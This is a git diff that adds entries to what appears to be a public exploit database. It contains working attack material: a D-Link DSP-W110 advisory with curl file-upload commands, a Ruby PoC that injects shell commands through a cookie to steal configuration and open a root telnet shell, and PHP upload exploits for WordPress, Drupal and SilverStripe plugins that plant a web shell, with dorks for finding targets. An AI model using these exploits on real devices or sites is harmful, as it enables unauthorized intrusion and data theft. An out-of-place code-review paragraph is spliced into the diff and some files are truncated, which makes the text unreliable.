diff --git a/files.csv b/files.csv
index 618b90a6e..190ae5b8f 100755
--- a/files.csv
+++ b/files.csv
@@ -33793,3 +33793,9 @@ id,file,description,date,author,platform,type,port
 37447,platforms/asp/webapps/37447.txt,"C2Box 4.0.0(r19171) - CSRF Vulnerability",2015-06-30,"Wissam Bashour",asp,webapps,0
 37448,platforms/multiple/remote/37448.rb,"Adobe Flash Player Drawing Fill Shader Memory Corruption",2015-06-30,metasploit,multiple,remote,0
 37449,platforms/hardware/webapps/37449.txt,"Polycom RealPresence Resource Manager < 8.4 - Multiple Vulnerabilities",2015-06-30,"SEC Consult",hardware,webapps,0
+37450,platforms/php/webapps/37450.txt,"Amazon S3 Uploadify Script 'uploadify.php' Arbitrary File Upload Vulnerability",2012-06-23,"Sammy FORGIT",php,webapps,0
+37451,platforms/php/webapps/37451.txt,"SilverStripe Pixlr Image Editor 'upload.php' Arbitrary File Upload Vulnerability",2012-06-23,"Sammy FORGIT",php,webapps,0
+37452,platforms/php/webapps/37452.txt,"WordPress Flip Book 'php.php' Arbitrary File Upload Vulnerability",2012-06-23,"Sammy FORGIT",php,webapps,0
+37453,platforms/php/webapps/37453.php,"Drupal Drag & Drop Gallery 'upload.php' Arbitrary File Upload Vulnerability",2012-06-25,"Sammy FORGIT",php,webapps,0
+37454,platforms/hardware/webapps/37454.txt,"D-Link DSP-W w110 v1.05b01 - Multiple Vulnerabilities",2015-07-01,DNO,hardware,webapps,0
+37456,platforms/windows/dos/37456.html,"McAfee SiteAdvisor 3.7.2 (firefox) Use After Free PoC",2015-07-01,"Marcin Ressel",windows,dos,0
diff --git a/platforms/hardware/webapps/37454.txt b/platforms/hardware/webapps/37454.txt
new file mode 100755
index 000000000..8073dceac
--- /dev/null
+++ b/platforms/hardware/webapps/37454.txt
@@ -0,0 +1,168 @@
+# Exploit Title: D-Link DSP-W Arbitrary Arbitrary file upload
+# Date: 30/06/2015
+# Exploit Author: DNO
+# Vendor Homepage: [link]
+# Version: w110 v1.05b01
+# Tested on: linux
+# CVE : N/A
+
+========================================
+
+the only 'filtering' on this resources appears to be a sprintf()
+call which statically prefixes a submitted 'dev' argument with '/www'.
+However,
+if a HTTP request is performed without a 'dev' argument at all, the
+sprintf() call is never reached,
+and a fully-qualified path can be provided in the 'path' parameter -
+bypassing the upload path restriction.
+
+***************
+# Upload arbitrary files to the device.
+echo 'Some String' > test.txt
+curl \
+ -X POST \
+ -i \
+ -F name=@test.txt \
+ --http1.0 \
+ '192.168.1.3/web_cgi.cgi?&request=UploadFile&path=/etc/'
+
+ ========================================
+
+# Exploit Title: D-Link DSP-W Diagnostic Information " Get info"
+# Date: 30/06/2015
+# Exploit Author: DNO
+# Version: w110 v1.05b01
+# Tested on: linux
+# CVE : N/A
+
+========================================
+Severity Level:
+===============
+High
+===============
+Patches made to lighttpd by the vendor of this device allows an attacker to
+query the device, without authentication, for the following information:
+
+# Current WLAN SSIDs
+# Current WLAN channels
+# LAN and WAN MAC addressing
+# Current firmware version information
+# Hardware version information
+
+Although not sensitive information, it may allow for identification of
+devices running vulnerable firmware versions.
+
+=========================================
+# Information query.
+curl \
+192.168.1.3/mplist.txt
+
+========================================
+#ruby poc
+----
+
+# DSP-W110-Lighttpd PoC.
+
+require 'pp'
+require 'optparse'
+require 'restclient'
+
+# Set defaults and parse command line arguments
+options = {}
+
+options[:addr] = "192.168.0.60"
+options[:port] = 80
+
+OptionParser.new do |option|
+
+option.on("--address [ADDRESS]", "Destination hostname or IP") do |a|
+options[:addr] = a
+end
+
+option.on("--port [PORT]", "Destination TCP port") do |p|
+options[:port] = p
+end
+
+option.parse!
+
+end
+
+# Define which actions we will be using.
+actions = [
+{
+:name => "Get device information",
+:call => "txt_parser",
+:path => "mplist.txt",
+},
+{
+:name => "Snatch configuration",
+:call => "noop",
+:path => "HNAP1",
+:cookies => { :cookie => "`cp /etc/co* /www/`" }
+},
+{
+:name => "Fetch configuration",
+:call => "conf_writer",
+:path => "config.sqlite",
+},
+{
+:name => "Enable telnet (root)",
+:call => "noop",
+:path => "HNAP1",
+:cookies => { :cookie => "`telnetd -l/bin/sh`" }
+}
+]
+
+def noop(val)
+return
+end
+
+def txt_parser(txt)
+txt.split(/\r?\n/).each do |line|
+puts " #{line}"
+end
+end
+
+def conf_writer(txt)
+begin
+f = File.open('./config.sqlite', 'wb')
+rescue => e
+puts "[!] Failed to open config.sqlite for writing #{e.message}"
+end
+f.write(txt)
+f.close
+puts "[*] Configuration fetched into 'config.sqlite'"
+end
+
+# Iterate over all actions and attempt to execute.
+url = "http://#{options[:addr]}:#{options[:port]}"
+
+puts "[!] Attempting to extract information from #{url}"
+
+actions.each do |action|
+
+# Fire the request and ensure a 200 OKAY.
+begin
+response = RestClient.get(
+"#{url}/#{action[:path]}",
+{:cookies => action[:cookies]}
+)
+rescue
+puts "[!] Failed to query remote host."
+abort
+end
+
+if response.code != 200
+puts "[-] '#{action[:name]}' failed with response: #{response.code}"
+next
+end
+
+# Send to the processor.
+puts "[*] #{action[:name]} request succeeded."
+send(action[:call], response.body())
+
+end
+===================================
+
+ contact me FB : FB.COM/haker.dyno
+ Copyright © 2015 /DNO/
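Review bot: `conf_writer` prints a message when `File.open` raises but then falls through to `f.write(txt)` with `f` never assigned, so an open failure surfaces as a `NoMethodError` on nil rather than the intended message; either `return` from the `rescue` or use the block form `File.open('./config.sqlite', 'wb') { |f| f.write(txt) }` inside the `begin` so the handle is also closed on error. `require 'pp'` is never used, `def noop(val)` should name its ignored parameter `_val`, and `response.body()` needs no parentheses. The advisory prose documents two issues (the upload path bypass and the unauthenticated `mplist.txt` query), but the two `HNAP1` actions in the Ruby PoC exercise a third, command execution through the Cookie header, which the header block never names; a one-line description of it alongside the other two would let defenders judge the full affected surface and what to watch for in lighttpd access logs.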
diff --git a/platforms/php/webapps/37450.txt b/platforms/php/webapps/37450.txt
new file mode 100755
index 000000000..bb2eaa7b7
--- /dev/null
+++ b/platforms/php/webapps/37450.txt
@@ -0,0 +1,64 @@
+source: http://www.securityfocus.com/bid/54170/info
+
+Amazon S3 Uploadify Script is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+Amazon S3 Uploadify Script 1.01 is vulnerable; other versions may also be affected.
+
+1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
+0 _ __ __ __ 1
+1 /' \ __ /'__`\ /\ \__ /'__`\ 0
+0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
+1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
+0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
+1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
+0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
+1 \ \____/ >> Exploit database separated by exploit 0
+0 \/___/ type (local, remote, DoS, etc.) 1
+1 1
+0 [+] Site : 1337day.com 0
+1 [+] Support e-mail : submit[at]1337day.com 1
+0 0
+1 ######################################### 1
+0 I'm Sammy FORGIT member from Inj3ct0r Team 1
+1 ######################################### 0
+0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
+##################################################
+# Description : uploadify-amazon-s3 Arbitrary File Upload Vulnerability
+# Version : 1.01
+# Link : http://code.google.com/p/uploadify-amazon-s3/
+# Software : http://code.google.com/p/uploadify-amazon-s3/downloads/detail?name=uploadify-amazon-s3-101.zip&can=2&q=
+# Date : 21-06-2012
+# Google Dork : inurl:/files/uploadify/ -google
+# Site : 1337day.com Inj3ct0r Exploit Database
+# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
+##################################################
+
+
+Exploit :
+
+"@$uploadfile"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+
+print "$postResult";
+
+?>
+
+Shell Access : http://www.exemple.com/files/uploadify/lo.php
+
+lo.php
+
+
+
+# Site : 1337day.com Inj3ct0r Exploit Database
diff --git a/platforms/php/webapps/37451.txt b/platforms/php/webapps/37451.txt
new file mode 100755
index 000000000..04b57fd6e
--- /dev/null
+++ b/platforms/php/webapps/37451.txt
@@ -0,0 +1,64 @@
+source: http://www.securityfocus.com/bid/54172/info
+
+Pixlr Image Editor is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+Pixlr Image Editor 1.0.4 is vulnerable; other versions may also be affected.
+
+1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
+0 _ __ __ __ 1
+1 /' \ __ /'__`\ /\ \__ /'__`\ 0
+0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
+1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
+0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
+1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
+0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
+1 \ \____/ >> Exploit database separated by exploit 0
+0 \/___/ type (local, remote, DoS, etc.) 1
+1 1
+0 [+] Site : 1337day.com 0
+1 [+] Support e-mail : submit[at]1337day.com 1
+0 0
+1 ######################################### 1
+0 I'm Sammy FORGIT member from Inj3ct0r Team 1
+1 ######################################### 0
+0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
+##################################################
+# Description : Silverstripe Modules - Pixlr Image Editor Arbitrary File Upload Vulnerability
+# Version : 1.0.4
+# Link : http://www.silverstripe.org/pixlr-image-editor-module/
+# Software : http://www.silverstripe.org/assets/modules/stable/svn.github.com-silverstripe-pixlr.git-r54.tar.gz
+# Date : 21-06-2012
+# Google Dork : not discover
+# Site : 1337day.com Inj3ct0r Exploit Database
+# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
+##################################################
+
+
+Exploit :
+
+"@$uploadfile"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+
+print "$postResult";
+
+?>
+
+Shell Access : http://www.exemple.com/silverstripe/pixlr/thirdparty/supa/data/lo.php
+
+lo.php
+
+
+
+# Site : 1337day.com Inj3ct0r Exploit Database
diff --git a/platforms/php/webapps/37452.txt b/platforms/php/webapps/37452.txt
new file mode 100755
index 000000000..3e6ee10f7
--- /dev/null
+++ b/platforms/php/webapps/37452.txt
@@ -0,0 +1,64 @@
+source: http://www.securityfocus.com/bid/54173/info
+
+Flip Book is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+Flip Book 1.0 is vulnerable; other versions may also be affected.
+
+1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
+0 _ __ __ __ 1
+1 /' \ __ /'__`\ /\ \__ /'__`\ 0
+0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
+1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
+0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
+1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
+0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
+1 \ \____/ >> Exploit database separated by exploit 0
+0 \/___/ type (local, remote, DoS, etc.) 1
+1 1
+0 [+] Site : 1337day.com 0
+1 [+] Support e-mail : submit[at]1337day.com 1
+0 0
+1 ######################################### 1
+0 I'm Sammy FORGIT member from Inj3ct0r Team 1
+1 ######################################### 0
+0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
+##################################################
+# Description : Wordpress Plugins - Flip Book Arbitrary File Upload Vulnerability
+# Version : 1.0
+# link : http://codecanyon.net/item/flip-book-wordpress-plugin/152641
+# Price : 30$
+# Date : 22-06-2012
+# Google Dork : inurl:/wp-content/plugins/flipbook/
+# Site : 1337day.com Inj3ct0r Exploit Database
+# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
+##################################################
+
+
+Exploit :
+
+"@$uploadfile"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+
+print "$postResult";
+
+?>
+
+Shell Access : http://www.exemple.com/wordpress/wp-includes/fb-images/lo.php
+
+lo.php
+
+
+
+# Site : 1337day.com Inj3ct0r Exploit Database
diff --git a/platforms/php/webapps/37453.php b/platforms/php/webapps/37453.php
new file mode 100755
index 000000000..a84d35972
--- /dev/null
+++ b/platforms/php/webapps/37453.php
@@ -0,0 +1,24 @@
+source: http://www.securityfocus.com/bid/54179/info
+
+Drag & Drop Gallery is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+Drag & Drop Gallery 6.X-1.5 is vulnerable; other versions may also be affected.
+
+"@$uploadfile",
+ 'user_file[1]'=>"@$uploadfile2"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+
+print "$postResult";
+
+?>
diff --git a/platforms/windows/dos/37456.html b/platforms/windows/dos/37456.html
new file mode 100755
index 000000000..ac3a0c2b3
--- /dev/null
+++ b/platforms/windows/dos/37456.html
@@ -0,0 +1,100 @@
+
+
+
+ + +